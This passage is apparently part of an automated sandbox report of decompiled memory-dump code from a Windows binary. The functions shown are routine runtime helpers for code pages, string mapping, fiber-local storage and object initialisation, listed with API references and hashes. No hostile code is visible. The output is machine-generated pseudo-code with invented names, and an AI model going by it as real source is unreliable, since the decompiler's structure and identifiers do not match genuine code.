                						_t69 = _t68 + _t95;
                						_v1824 = _t69;
                						__eflags = _t69 + 0x20 - 0x19;
                						if(_t69 + 0x20 > 0x19) {
                							__eflags = _v1824 - 0x19;
                							if(_v1824 > 0x19) {
                								 *_t95 = 0;
                							} else {
                								_t72 = _t99 + _t88;
                								_t57 = _t72 + 0x19;
                								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
                								__eflags =  *_t57;
                								_t59 = _t88 - 0x20; // -32
                								_t73 = _t59;
                								goto L24;
                							}
                						} else {
                							 *(_t99 + _t88 + 0x19) =  *(_t99 + _t88 + 0x19) | 0x00000010;
                							_t54 = _t88 + 0x20; // 0x20
                							_t73 = _t54;
                							L24:
                							 *_t95 = _t73;
                						}
                						_t68 = _v1828;
                						_t61 = _t99 + 0x119; // 0xccab69
                						_t94 = _t61;
                						_t88 = _t88 + 1;
                						__eflags = _t88 - 0x100;
                					} while (_t88 < 0x100);
                				} else {
                					_t74 = 0;
                					do {
                						 *((char*)(_t100 + _t74 - 0x104)) = _t74;
                						_t74 = _t74 + 1;
                					} while (_t74 < 0x100);
                					_t75 = _v1814;
                					_t91 =  &_v1814;
                					_v264 = 0x20;
                					while(1) {
                						_t106 = _t75;
                						if(_t75 == 0) {
                							break;
                						}
                						_t93 =  *(_t91 + 1) & 0x000000ff;
                						_t76 = _t75 & 0x000000ff;
                						while(1) {
                							__eflags = _t76 - _t93;
                							if(_t76 > _t93) {
                								break;
                							}
                							__eflags = _t76 - 0x100;
                							if(_t76 < 0x100) {
                								 *((char*)(_t100 + _t76 - 0x104)) = 0x20;
                								_t76 = _t76 + 1;
                								__eflags = _t76;
                								continue;
                							}
                							break;
                						}
                						_t91 = _t91 + 2;
                						__eflags = _t91;
                						_t75 =  *_t91;
                					}
                					_t13 = _t99 + 4; // 0x5efc4d8b
                					E00CCB5EA(0, _t93, 0x100, _t99, _t106, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
                					_t16 = _t99 + 4; // 0x5efc4d8b
                					_t19 = _t99 + 0x21c; // 0x2ebf88b
                					E00CC97C2(0x100, _t99, _t106, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
                					_t21 = _t99 + 4; // 0x5efc4d8b
                					_t23 = _t99 + 0x21c; // 0x2ebf88b
                					E00CC97C2(0x100, _t99, _t106, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
                					_t92 = 0;
                					do {
                						_t68 =  *(_t100 + _t92 * 2 - 0x704) & 0x0000ffff;
                						if((_t68 & 0x00000001) == 0) {
                							__eflags = _t68 & 0x00000002;
                							if((_t68 & 0x00000002) == 0) {
                								 *(_t99 + _t92 + 0x119) = 0;
                							} else {
                								_t37 = _t99 + _t92 + 0x19;
                								 *_t37 =  *(_t99 + _t92 + 0x19) | 0x00000020;
                								__eflags =  *_t37;
                								_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x304));
                								goto L15;
                							}
                						} else {
                							 *(_t99 + _t92 + 0x19) =  *(_t99 + _t92 + 0x19) | 0x00000010;
                							_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x204));
                							L15:
                							 *(_t99 + _t92 + 0x119) = _t68;
                						}
                						_t92 = _t92 + 1;
                					} while (_t92 < 0x100);
                				}
                				return E00CBE203(_t68, _v8 ^ _t100);
                			}






























                APIs
                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CCA543
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Info
                • String ID:
                • API String ID: 1807457897-3916222277
                • Opcode ID: 5e92627018229730641f46808cd45a1b5ef349e6191e66c075c45f2bab3bc06d
                • Instruction ID: bd916212fb871470fcdf5d4c484375bf10bf4216bd2a1a71feabdde8e919a4fb
                • Opcode Fuzzy Hash: 5e92627018229730641f46808cd45a1b5ef349e6191e66c075c45f2bab3bc06d
                • Instruction Fuzzy Hash: 9E412A7090428C9EDF228E64CC88FFABBB9DB55308F1804EDE59A87142D2359A46DF21
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00CA1D61(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
                				void* _t34;
                				intOrPtr _t41;
                				intOrPtr _t51;
                				void* _t62;
                				unsigned int _t64;
                				signed int _t66;
                				intOrPtr* _t68;
                				void* _t70;
                
                				_t62 = __edx;
                				_t51 = __ecx;
                				E00CBD870(E00CD1173, _t70);
                				_t49 = 0;
                				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
                				 *((intOrPtr*)(_t70 - 0x24)) = 0;
                				 *(_t70 - 0x20) = 0;
                				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
                				 *((intOrPtr*)(_t70 - 0x18)) = 0;
                				 *((char*)(_t70 - 0x14)) = 0;
                				 *((intOrPtr*)(_t70 - 4)) = 0;
                				_t34 = E00CA399D(_t51, _t62, _t70 - 0x24, 0, 0); // executed
                				if(_t34 != 0) {
                					_t64 =  *(_t70 - 0x20);
                					E00CA16C0(_t70 - 0x24, _t62, 1);
                					_t68 =  *((intOrPtr*)(_t70 + 8));
                					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
                					_t16 = _t64 + 1; // 0x1
                					E00CA1837(_t68, _t16);
                					_t41 =  *((intOrPtr*)(_t70 - 0x10));
                					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
                						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
                							E00CB0FDE( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
                						} else {
                							_t66 = _t64 >> 1;
                							E00CB1059( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
                							 *((short*)( *_t68 + _t66 * 2)) = 0;
                						}
                					} else {
                						_push( *((intOrPtr*)(_t68 + 4)));
                						_push( *_t68);
                						_push( *((intOrPtr*)(_t70 - 0x24)));
                						E00CB1094();
                					}
                					E00CA1837(_t68, E00CC2B33( *_t68));
                					_t49 = 1;
                				}
                				E00CA159C(_t70 - 0x24);
                				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
                				return _t49;
                			}












                APIs
                • __EH_prolog.LIBCMT ref: 00CA1D66
                  • Part of subcall function 00CA399D: __EH_prolog.LIBCMT ref: 00CA39A2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prolog
                • String ID: CMT
                • API String ID: 3519838083-2756464174
                • Opcode ID: 4b6921e4676272c5ed63b32a158ce047e419fc9ed9e8837ebed39f96f8d1417e
                • Instruction ID: f2ffa2bda8ae83e920bb08a1df804b382e371fcce86f401d7cc74ef0deb37023
                • Opcode Fuzzy Hash: 4b6921e4676272c5ed63b32a158ce047e419fc9ed9e8837ebed39f96f8d1417e
                • Instruction Fuzzy Hash: D6217A729002099FCB11EF98C9519EEFBF6FF0A304F1800AEE855A7251CB325E00DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00CC9C64(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                				signed int _v8;
                				signed int _t18;
                				intOrPtr* _t20;
                				int _t22;
                				intOrPtr* _t30;
                				signed int _t32;
                
                				_t25 = __ecx;
                				_push(__ecx);
                				_t18 =  *0xcdd668; // 0x814d2927
                				_v8 = _t18 ^ _t32;
                				_push(__esi);
                				_t20 = E00CC9990(0x16, "LCMapStringEx", 0xcd6084, "LCMapStringEx"); // executed
                				_t30 = _t20;
                				if(_t30 == 0) {
                					_t22 = LCMapStringW(E00CC9CEC(_t25, _t30, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
                				} else {
                					 *0xcd2260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
                					_t22 =  *_t30();
                				}
                				return E00CBE203(_t22, _v8 ^ _t32);
                			}










                APIs
                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 00CC9CD5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: String
                • String ID: LCMapStringEx
                • API String ID: 2568140703-3893581201
                • Opcode ID: 4d32e39f08fb576e24d1ccabc697c8bc04980d85748cc85bcfa68630de02bb19
                • Instruction ID: 10fb11a2ced50b6ecc39724236dfef80fec0f006738d8f0c1e29d1ac406c7c55
                • Opcode Fuzzy Hash: 4d32e39f08fb576e24d1ccabc697c8bc04980d85748cc85bcfa68630de02bb19
                • Instruction Fuzzy Hash: D501D332541209BBCF12AF90DD05EEE7FA6EB08760F01455AFE1926261CA729931EB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00CC9C02(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
                				signed int _v8;
                				signed int _t8;
                				intOrPtr* _t10;
                				int _t11;
                				intOrPtr* _t19;
                				signed int _t21;
                
                				_push(__ecx);
                				_t8 =  *0xcdd668; // 0x814d2927
                				_v8 = _t8 ^ _t21;
                				_t10 = E00CC9990(0x14, "InitializeCriticalSectionEx", 0xcd607c, 0xcd6084); // executed
                				_t19 = _t10;
                				if(_t19 == 0) {
                					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
                				} else {
                					 *0xcd2260(_a4, _a8, _a12);
                					_t11 =  *_t19();
                				}
                				return E00CBE203(_t11, _v8 ^ _t21);
                			}










                APIs
                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CC9291), ref: 00CC9C4D
                Strings
                • InitializeCriticalSectionEx, xrefs: 00CC9C1D
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: CountCriticalInitializeSectionSpin
                • String ID: InitializeCriticalSectionEx
                • API String ID: 2593887523-3084827643
                • Opcode ID: 0e7f861251bc215e9bf4a46a542ff80b26a1975ece351384ea5842bbc2d8fe88
                • Instruction ID: 8c417a2adffa6da1cb025daf0da1a85a1cd02ca54b4c9e20df6e209c00da3b35
                • Opcode Fuzzy Hash: 0e7f861251bc215e9bf4a46a542ff80b26a1975ece351384ea5842bbc2d8fe88
                • Instruction Fuzzy Hash: 52F0B431A4120CFBCB156F50DC05EAE7FA5EB08721B01416AFE1916260CA728E10EBC0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00CC9AA7(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
                				signed int _v8;
                				signed int _t4;
                				intOrPtr* _t6;
                				long _t7;
                				intOrPtr* _t15;
                				signed int _t17;
                
                				_push(__ecx);
                				_t4 =  *0xcdd668; // 0x814d2927
                				_v8 = _t4 ^ _t17;
                				_t6 = E00CC9990(3, "FlsAlloc", 0xcd6040, 0xcd6048); // executed
                				_t15 = _t6;
                				if(_t15 == 0) {
                					_t7 = TlsAlloc();
                				} else {
                					 *0xcd2260(_a4);
                					_t7 =  *_t15();
                				}
                				return E00CBE203(_t7, _v8 ^ _t17);
                			}










                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Alloc
                • String ID: FlsAlloc
                • API String ID: 2773662609-671089009
                • Opcode ID: cd5edaa8ed244fd0426e115ad1c184ef3187db2c4e6e956cff99d5540f478765
                • Instruction ID: 43e0f8d40fd6c63d16ef17298ccc69bcb3c316c27b201553d10c8ce5f3c3b3e3
                • Opcode Fuzzy Hash: cd5edaa8ed244fd0426e115ad1c184ef3187db2c4e6e956cff99d5540f478765
                • Instruction Fuzzy Hash: 6CE02B31E46218B7C720AB65DC0AF6FBBA8DB14B21B01046FFD0957391CE716E10E6D9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E00CC281A(void* __eflags, intOrPtr _a4) {
                				intOrPtr* _t2;
                				intOrPtr* _t6;
                
                				_t2 = E00CC26F9(4, "FlsAlloc", 0xcd4394, "FlsAlloc"); // executed
                				_t6 = _t2;
                				if(_t6 == 0) {
                					return TlsAlloc();
                				}
                				L00CBE2DD();
                				return  *_t6(_a4);
                			}






                APIs
                • try_get_function.LIBVCRUNTIME ref: 00CC282F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: try_get_function
                • String ID: FlsAlloc
                • API String ID: 2742660187-671089009
                • Opcode ID: bef63aa743a12c02414df9c4ac54f6e346d6a2945b4ce8dfc01bcbe5b3d09eb1
                • Instruction ID: 37540ce930c75cda1701aeae76430522a9c759111fb679c586221c4142adf19a
                • Opcode Fuzzy Hash: bef63aa743a12c02414df9c4ac54f6e346d6a2945b4ce8dfc01bcbe5b3d09eb1
                • Instruction Fuzzy Hash: A9D01722682728A7C91432DDAC02BAABA588A01BA1F054173FF0C652A2D6A5591066E2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E00CCA873(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                				signed int _v8;
                				char _v22;
                				struct _cpinfo _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _t48;
                				int _t51;
                				signed int _t54;
                				signed int _t55;
                				short _t58;
                				signed int _t60;
                				signed char _t62;
                				signed int _t63;
                				signed char* _t71;
                				signed char* _t72;
                				int _t76;
                				signed int _t79;
                				signed char* _t80;
                				short* _t81;
                				int _t85;
                				signed char _t86;
                				signed int _t87;
                				signed int _t89;
                				signed int _t90;
                				int _t92;
                				int _t93;
                				intOrPtr _t96;
                				signed int _t97;
                
                				_t48 =  *0xcdd668; // 0x814d2927
                				_v8 = _t48 ^ _t97;
                				_t96 = _a8;
                				_t76 = E00CCA446(__eflags, _a4);
                				if(_t76 != 0) {
                					_t92 = 0;
                					__eflags = 0;
                					_t79 = 0;
                					_t51 = 0;
                					_v32 = 0;
                					while(1) {
                						__eflags =  *((intOrPtr*)(_t51 + 0xcdd828)) - _t76;
                						if( *((intOrPtr*)(_t51 + 0xcdd828)) == _t76) {
                							break;
                						}
                						_t79 = _t79 + 1;
                						_t51 = _t51 + 0x30;
                						_v32 = _t79;
                						__eflags = _t51 - 0xf0;
                						if(_t51 < 0xf0) {
                							continue;
                						} else {
                							__eflags = _t76 - 0xfde8;
                							if(_t76 == 0xfde8) {
                								L23:
                								_t60 = _t51 | 0xffffffff;
                							} else {
                								__eflags = _t76 - 0xfde9;
                								if(_t76 == 0xfde9) {
                									goto L23;
                								} else {
                									_t51 = IsValidCodePage(_t76 & 0x0000ffff);
                									__eflags = _t51;
                									if(_t51 == 0) {
                										goto L23;
                									} else {
                										_t51 = GetCPInfo(_t76,  &_v28);
                										__eflags = _t51;
                										if(_t51 == 0) {
                											__eflags =  *0xd00854 - _t92; // 0x0
                											if(__eflags == 0) {
                												goto L23;
                											} else {
                												E00CCA4B9(_t96);
                												goto L37;
                											}
                										} else {
                											E00CBE920(_t92, _t96 + 0x18, _t92, 0x101);
                											 *(_t96 + 4) = _t76;
                											 *(_t96 + 0x21c) = _t92;
                											_t76 = 1;
                											__eflags = _v28 - 1;
                											if(_v28 <= 1) {
                												 *(_t96 + 8) = _t92;
                											} else {
                												__eflags = _v22;
                												_t71 =  &_v22;
                												if(_v22 != 0) {
                													while(1) {
                														_t86 = _t71[1];
                														__eflags = _t86;
                														if(_t86 == 0) {
                															goto L16;
                														}
                														_t89 = _t86 & 0x000000ff;
                														_t87 =  *_t71 & 0x000000ff;
                														while(1) {
                															__eflags = _t87 - _t89;
                															if(_t87 > _t89) {
                																break;
                															}
                															 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000004;
                															_t87 = _t87 + 1;
                															__eflags = _t87;
                														}
                														_t71 =  &(_t71[2]);
                														__eflags =  *_t71;
                														if( *_t71 != 0) {
                															continue;
                														}
                														goto L16;
                													}
                												}
                												L16:
                												_t72 = _t96 + 0x1a;
                												_t85 = 0xfe;
                												do {
                													 *_t72 =  *_t72 | 0x00000008;
                													_t72 =  &(_t72[1]);
                													_t85 = _t85 - 1;
                													__eflags = _t85;
                												} while (_t85 != 0);
                												 *(_t96 + 0x21c) = E00CCA408( *(_t96 + 4));
                												 *(_t96 + 8) = _t76;
                											}
                											_t93 = _t96 + 0xc;
                											asm("stosd");
                											asm("stosd");
                											asm("stosd");
                											L36:
                											E00CCA51E(_t76, _t89, _t93, _t96, _t96); // executed
                											L37:
                											_t60 = 0;
                											__eflags = 0;
                										}
                									}
                								}
                							}
                						}
                						goto L39;
                					}
                					E00CBE920(_t92, _t96 + 0x18, _t92, 0x101);
                					_t54 = _v32 * 0x30;
                					__eflags = _t54;
                					_v36 = _t54;
                					_t55 = _t54 + 0xcdd838;
                					_v32 = _t55;
                					do {
                						__eflags =  *_t55;
                						_t80 = _t55;
                						if( *_t55 != 0) {
                							while(1) {
                								_t62 = _t80[1];
                								__eflags = _t62;
                								if(_t62 == 0) {
                									break;
                								}
                								_t90 =  *_t80 & 0x000000ff;
                								_t63 = _t62 & 0x000000ff;
                								while(1) {
                									__eflags = _t90 - _t63;
                									if(_t90 > _t63) {
                										break;
                									}
                									__eflags = _t90 - 0x100;
                									if(_t90 < 0x100) {
                										_t31 = _t92 + 0xcdd820; // 0x8040201
                										 *(_t96 + _t90 + 0x19) =  *(_t96 + _t90 + 0x19) |  *_t31;
                										_t90 = _t90 + 1;
                										__eflags = _t90;
                										_t63 = _t80[1] & 0x000000ff;
                										continue;
                									}
                									break;
                								}
                								_t80 =  &(_t80[2]);
                								__eflags =  *_t80;
                								if( *_t80 != 0) {
                									continue;
                								}
                								break;
                							}
                							_t55 = _v32;
                						}
                						_t92 = _t92 + 1;
                						_t55 = _t55 + 8;
                						_v32 = _t55;
                						__eflags = _t92 - 4;
                					} while (_t92 < 4);
                					 *(_t96 + 4) = _t76;
                					 *(_t96 + 8) = 1;
                					 *(_t96 + 0x21c) = E00CCA408(_t76);
                					_t81 = _t96 + 0xc;
                					_t89 = _v36 + 0xcdd82c;
                					_t93 = 6;
                					do {
                						_t58 =  *_t89;
                						_t89 = _t89 + 2;
                						 *_t81 = _t58;
                						_t81 = _t81 + 2;
                						_t93 = _t93 - 1;
                						__eflags = _t93;
                					} while (_t93 != 0);
                					goto L36;
                				} else {
                					E00CCA4B9(_t96);
                					_t60 = 0;
                				}
                				L39:
                				return E00CBE203(_t60, _v8 ^ _t97);
                			}
































                APIs
                  • Part of subcall function 00CCA446: GetOEMCP.KERNEL32(00000000,?,?,00CCA6CF,?), ref: 00CCA471
                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CCA714,?,00000000), ref: 00CCA8E7
                • GetCPInfo.KERNEL32(00000000,00CCA714,?,?,?,00CCA714,?,00000000), ref: 00CCA8FA
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: CodeInfoPageValid
                • String ID:
                • API String ID: 546120528-0
                • Opcode ID: ef5107395b086f9ca98b64a031213e8711bf8947cc9c4802a0e175ea9d5fe8b1
                • Instruction ID: d75f73f3384a1ea79d9cde913dd6bb73171ae79279b2264d6cb0a5ed6e2495f5
                • Opcode Fuzzy Hash: ef5107395b086f9ca98b64a031213e8711bf8947cc9c4802a0e175ea9d5fe8b1
                • Instruction Fuzzy Hash: 19513670D0024D5FDB25CF72C84AFBBBBE5AF01318F14806ED0A687192D7349A46DB92
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E00CA1382(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
                				void* __esi;
                				void* _t56;
                				signed int _t62;
                				signed int _t63;
                				char _t64;
                				intOrPtr _t74;
                				intOrPtr* _t78;
                				void* _t86;
                				void* _t87;
                				intOrPtr* _t89;
                				void* _t91;
                				void* _t96;
                
                				_t96 = __eflags;
                				_t87 = __edi;
                				_t86 = __edx;
                				_t78 = __ecx;
                				E00CBD870(_t56, _t91);
                				_push(_t78);
                				_t89 = _t78;
                				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
                				E00CA943C(_t78);
                				 *_t89 = 0xcd22e8;
                				 *((intOrPtr*)(_t91 - 4)) = 0;
                				E00CA5E99(_t89 + 0x1024, _t86, _t96);
                				 *((char*)(_t91 - 4)) = 1;
                				E00CAC4CA(_t89 + 0x20e8, _t86, _t96);
                				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
                				E00CA151B();
                				_t62 = E00CA151B();
                				 *((char*)(_t91 - 4)) = 4;
                				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
                				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
                				 *(_t89 + 0x21b8) = _t63;
                				_t98 = _t63;
                				if(_t63 == 0) {
                					_t64 =  *((intOrPtr*)(_t91 + 8));
                				} else {
                					_t74 = E00CBD82C(_t86, _t89, _t98, 0x82e8);
                					 *((intOrPtr*)(_t91 + 8)) = _t74;
                					 *((char*)(_t91 - 4)) = 5;
                					if(_t74 == 0) {
                						_t64 = 0;
                					} else {
                						_t64 = E00CAAD1B(_t74); // executed
                					}
                				}
                				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
                				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
                				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
                				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
                				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
                				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
                				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
                				 *((char*)(_t89 + 0x6cbc)) = 0;
                				 *((short*)(_t89 + 0x6cc4)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
                				E00CBE920(_t87, _t89 + 0x2208, 0, 0x40);
                				E00CBE920(_t87, _t89 + 0x2248, 0, 0x34);
                				E00CBE920(_t87, _t89 + 0x4590, 0, 0x20);
                				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
                				 *((short*)(_t89 + 0x6cfa)) = 0;
                				 *((char*)(_t89 + 0x6cd6)) = 0;
                				 *((char*)(_t89 + 0x6cf8)) = 0;
                				 *((char*)(_t89 + 0x21e0)) = 0;
                				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
                				return _t89;
                			}
















                APIs
                • __EH_prolog.LIBCMT ref: 00CA1382
                  • Part of subcall function 00CA5E99: __EH_prolog.LIBCMT ref: 00CA5E9E
                  • Part of subcall function 00CAC4CA: __EH_prolog.LIBCMT ref: 00CAC4CF
                  • Part of subcall function 00CAC4CA: new.LIBCMT ref: 00CAC512
                  • Part of subcall function 00CAC4CA: new.LIBCMT ref: 00CAC536
                • new.LIBCMT ref: 00CA13FA
                  • Part of subcall function 00CAAD1B: __EH_prolog.LIBCMT ref: 00CAAD20
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 5d7bb047d71767ce40c152e118097091d0f62aae71148933dd17f2f7a4b64989
                • Instruction ID: 439c5229691de7aa5b2378cb7d4ced15ca9320a9bb5457a8e73ecc3463eda4be
                • Opcode Fuzzy Hash: 5d7bb047d71767ce40c152e118097091d0f62aae71148933dd17f2f7a4b64989
                • Instruction Fuzzy Hash: 894144B0805B409EE720DF798485AE6FBE5FF19314F544A2EE9EE83282CB326554CB11
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E00CA137D(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
                				void* __esi;
                				signed int _t62;
                				signed int _t63;
                				char _t64;
                				intOrPtr _t74;
                				intOrPtr* _t78;
                				void* _t86;
                				void* _t87;
                				intOrPtr* _t89;
                				void* _t91;
                				void* _t96;
                
                				_t96 = __eflags;
                				_t87 = __edi;
                				_t86 = __edx;
                				_t78 = __ecx;
                				E00CBD870(E00CD1157, _t91);
                				_push(_t78);
                				_t89 = _t78;
